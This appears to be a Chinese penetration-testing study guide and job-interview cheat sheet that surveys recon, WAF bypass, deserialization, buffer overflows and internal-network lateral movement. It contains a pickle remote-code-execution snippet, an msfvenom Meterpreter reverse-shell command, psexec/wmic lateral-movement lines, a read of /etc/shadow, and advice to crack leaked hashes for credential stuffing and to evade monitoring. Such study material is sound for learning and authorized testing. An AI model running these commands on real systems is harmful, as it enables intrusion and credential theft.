## 目录导航
参考：https://mp.weixin.qq.com/s/f-9w9wHEW2ORsRQE2wX07w
- 一、信息收集
- 二、漏洞利用
- 三、漏洞挖掘
- 四、综合技能
## 一、信息收集：不止于 "找域名"
### 1. 证书透明度（CT）日志反查隐藏资产
核心价值 ：突破常规子域名爆破局限，发现企业未公开的测试环境、内部系统域名。

操作要点 ：

步骤 说明 工具选择 crt.sh、Google CT等平台 输入条件 企业邮箱后缀（如 @xxx.com ）或根域名 筛选重点 证书颁发时间在3个月内的记录（这类资产往往防护较弱） 验证确认 结合whois反查，确认证书绑定的IP是否属于目标网段

注意事项 ：需排除第三方合作企业的无关证书，可通过证书主体中的 "Organization" 字段过滤。

### 2. 基于流量分析的存活主机探测
核心价值 ：在目标网段禁止ICMP（ping不通）时，精准定位存活主机。

操作要点 ：

```
# 使用ACK扫描或半开放扫描
nmap -sA <target>  # ACK扫描
nmap -sS <target>  # 半开放扫描

# 针对常见端口发送探测包
# 常见端口：80、443、3389、22

# 全端口扫描
nmap -p- <target>
```
实战经验 ：

- 对大型网段（如 192.168.0.0/16 ），可先用masscan快速扫常见端口
- 再用Nmap精细化验证，效率提升50%以上
- 结合Wireshark抓包分析，识别TCP指纹判断主机是否存活
### 3. 暗网数据关联分析
核心价值 ：排查目标是否有员工账号、内部文档泄露，提前发现"已被入侵"的隐患。

操作要点 ：

1. 通过Tor网络访问暗网论坛、数据交易平台
2. 用目标企业名称、域名、员工邮箱前缀作为关键词检索
3. 重点关注"社工库""内部系统截图"类信息
4. 对发现的泄露账号，用Hashcat破解密码后进行"撞库"验证
⚠️ 风险提示 ：
 访问暗网需遵守法律法规，仅可在授权范围内分析公开泄露数据，禁止主动获取未公开信息。
## 二、漏洞利用：从 "能利用" 到 "高效利用"
### 4. WAF绕过：基于HTTP协议特性的精准绕过
核心价值 ：突破常见Web应用防火墙（如阿里云WAF、Cloudflare），实现漏洞验证与利用。
 协议层面绕过
技术 说明 HTTP/2多路复用 将Payload拆分到多个数据流中 分块传输编码 Transfer-Encoding: chunked 拆分Payload 注释嵌套 SQL注入： /*/*/union/*/*/select 大小写混合 非大小写敏感WAF无效（针对规则不严谨的防护）
 工具辅助
```
# 使用Burp Suite的WAF Bypass插件
# SQLiPy插件生成变异Payload
# 结合Intruder模块批量验证绕过效果
```
关键原则 ：不依赖"通用绕过脚本"，需根据目标WAF的拦截日志定制策略。

### 5. 反序列化漏洞：跨语言利用与内存马注入
核心价值 ：解决Java、Python、PHP等不同语言反序列化漏洞的利用差异。
 Java反序列化
技术 说明 gadget链 Commons Collections、Fastjson等组件 命令执行 生成包含"命令执行"的序列化数据 内存马注入 Tomcat内存马 类加载攻击 通过ClassLoader加载恶意class文件
 Python反序列化
```
# pickle模块漏洞利用
import pickle
import os

class RCE:
    def __reduce__(self):
        # 规避沙箱限制
        return (os.system, ('whoami',))

pickle.dumps(RCE())
```
验证建议 ：优先通过DNSlog（如ceye.io）确认命令执行成功，避免直接执行whoami导致被监控察觉。

### 6. 缓冲区溢出：DEP与ASLR防护绕过
核心价值 ：在Windows、Linux系统的现代防护机制下，实现传统溢出漏洞的利用。
 绕过DEP（数据执行保护）
技术 说明 ROP Return-Oriented Programming，拼接内存中已有的合法指令片段 gadget 构造不包含可执行代码的Payload
 绕过ASLR（地址空间布局随机化）
技术 说明 信息泄露 栈溢出泄露libc基地址 爆破 针对ASLR未完全开启的系统（如Windows XP）
 实战工具
```
# 生成带ROP链的Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> 
LPORT=<PORT> -f raw -o payload.bin

# 定位溢出点
pattern_create.rb <length>
pattern_offset.rb <pattern>
```
## 三、漏洞挖掘与利用
### 常见漏洞类型与利用要点 Web漏洞
漏洞类型 利用要点 SQL注入 UNION注入、布尔盲注、时间盲注、报错注入 XSS 存储型XSS、DOM型XSS、Cookie窃取 CSRF 结合XSS实现攻击 SSRF 内网探测、任意读取 文件上传 Webshell上传、绕过扩展名检测 反序列化 Java、PHP、Python各语言利用方式不同
 二进制漏洞
漏洞类型 利用要点 缓冲区溢出 栈溢出、堆溢出、格式化字符串 整数溢出 长度验证绕过 逻辑漏洞 越权、支付漏洞

### 漏洞挖掘实战技巧 1. 代码审计要点
语言 危险函数 审计重点 PHP eval() , exec() , system() , assert() 命令执行 Java ObjectInputStream() , XMLDecoder() 反序列化 Python pickle.loads() , eval() , exec() 代码执行 JavaScript eval() , Function() 代码注入
 2. 模糊测试（Fuzzing）
```
# 使用Burp Suite Intruder进行模糊测试
# 常用Payload类型：
# - 简单列表
# - 运行时文件
# - 模糊测试器（SQL注入、XSS等）

# 使用ffuf进行Web模糊测试
ffuf -w wordlist.txt -u https://target/FUZZ
``` 3. 漏洞验证优先级
优先级 漏洞类型 原因 P0 SQL注入、命令执行 直接获取系统权限 P1 反序列化、文件上传 可能获取Shell P2 XSS、CSRF、SSRF 钓鱼、信息收集 P3 敏感信息泄露 凭据收集

## 四、综合技能
### 渗透测试方法论 标准渗透测试流程
```
信息收集 → 漏洞扫描 → 漏洞利用 → 权限提升 → 横向移动 → 权限维持 → 
清理痕迹
``` 内网渗透要点
Windows内网

```
# 本地信息收集
net user
net localgroup administrators
netstat -ano

# 横向移动
psexec \\targetip -u username -p password cmd.exe
wmic /node:targetip process call create "command"

# 域环境
BloodHound收集域信息
kerberoast攻击
```
Linux内网

```
# 本地信息收集
whoami
cat /etc/passwd
cat /etc/shadow

# 横向移动
ssh user@targetip
pspy监控计划任务

# 提权
sudo -l
suid提权
```
### 常用工具链
阶段 工具 信息收集 Nmap、Masscan、Subfinder、FOFA、Shodan、Censys 漏洞扫描 Nessus、OpenVAS、Nexpose、Awvs 漏洞利用 Metasploit、Cobalt Strike、Burp Suite、SQLMap 密码攻击 Hydra、John the Ripper、Hashcat 内网渗透 BloodHound、Responder、Impacket、CrackMapExec 后门检测 YARA、Volatility

### 面试核心要点 1. 必备技能清单
类别 必会技能 基础 Nmap使用、SQL注入、XSS、CSRF、文件上传 进阶 反序列化漏洞、内网渗透、域环境攻击 高级 免杀、漏洞挖掘、代码审计、二进制漏洞利用
 2. 面试加分项
项目 说明 CVE/NVD编号 提交过漏洞或有CVE编号 CTF成绩 有CTF获奖经历 实战经验 有授权渗透测试项目经验 代码能力 能写PoC/Exp，代码审计能力 免杀经验 木马免杀实战经验
 3. 常见面试问题
问题类型 示例 基础概念 SQL注入原理、XSS分类、CSRF防御 实战经验 渗透测试流程、遇到过最难的问题 漏洞原理 反序列化漏洞原理、缓冲区溢出原理 工具使用 Burp Suite技巧、Nmap高级用法 代码能力 能否写Python脚本/PoC

## 总结
渗透测试工程师的核心竞争力体现在：

1. 扎实的基础 ：熟悉常见漏洞原理和利用方法
2. 实战经验 ：有独立的渗透测试项目经验
3. 工具熟练度 ：能够高效使用各类安全工具
4. 代码能力 ：能够编写PoC/Exp，进行代码审计
5. 持续学习 ：关注最新漏洞和攻击手法 温馨提示 ：面试时不只要会说"会用工具"，更要理解原理，才能应对各种场景！

高频渗透面试题必须会